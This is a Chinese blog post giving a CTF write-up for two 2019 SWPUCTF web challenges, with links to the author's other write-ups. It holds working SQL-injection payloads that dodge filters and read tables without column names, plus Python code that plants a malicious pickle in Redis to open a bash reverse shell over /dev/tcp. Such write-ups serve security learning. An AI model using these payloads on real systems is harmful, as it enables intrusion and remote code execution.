web1

二次注入，在文章发表广告名存在注入，过滤了or，空格，不能用order by查字段，可以用group by查字段，也不能用information_schema这个库查询，所以通过其他方式查询表，无列名注入，附一个链接聊一聊bypass information_schema，下面直接给出payload。

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/sys.schema_auto_increment_columns/**/where/**/table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22    //查表
-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22    //查表
-1'union/**/select/**/1,(select/**/group_concat(a)/**/from/**/(select/**/1,2,3/**/as/**/a/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22    //无列名注入
-1'/**/union/**/select/**/1,(select/**/group_concat(c)/**/from/**/(select/**/'a','b','c'/**/union/**/select/**/*/**/from/**/users)a),3,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1'    //无列名注入

下面给些图理解
1576504645263

1576504750757
1576504867049
1576504959852

web2

登录源码提示redis，redis-cli -h host -p 6379可以链接redis库，弹个shell，找到flag。

import cPickle
import os
import redis
class exp(object):
    def __reduce__(self):
        s = "bash -i >& /dev/tcp/xx/xx 0>&1"
        return (os.system, (s,))
e = exp()
s = cPickle.dumps(e)
print s
r = redis.Redis(host='114.67.109.247',password="password", port=6379, db=0)
r.set("session:your_session", s)

LiM

https://Li1M.github.io/2019/12/16/2019SWPUCTF-web%E9%A2%98%E8%A7%A3/

All articles in this blog are used except for special statements CC BY 4.0 reprint polocy. If reproduced, please indicate source LiM !

CTF web

2019-GXYCTFweb部分题解

简单记录一下 1.web1首先是一个git泄露，当时看是403就没注意了，没想到就是这样做的，上工具下载源码是无参数rce，直接给payload exp=var_dump(readfile(next(array_reverse(scandi

2019-12-22 LiM

CTF web

2019 Stalker招新web和crypto题解

WEB来签个到吧这个题考脑洞，打开链接一看url感觉不太对劲，是D0G.php，题目提示了不是DOG吗，所以访问DOG.php，提交得到flag。代码审计第一层是extract($_GET);可以变量覆盖，所以只要构造a和b值为空就行，具

2019-12-10 LiM

web crypto

2019SWPUCTF web题解

web1

web2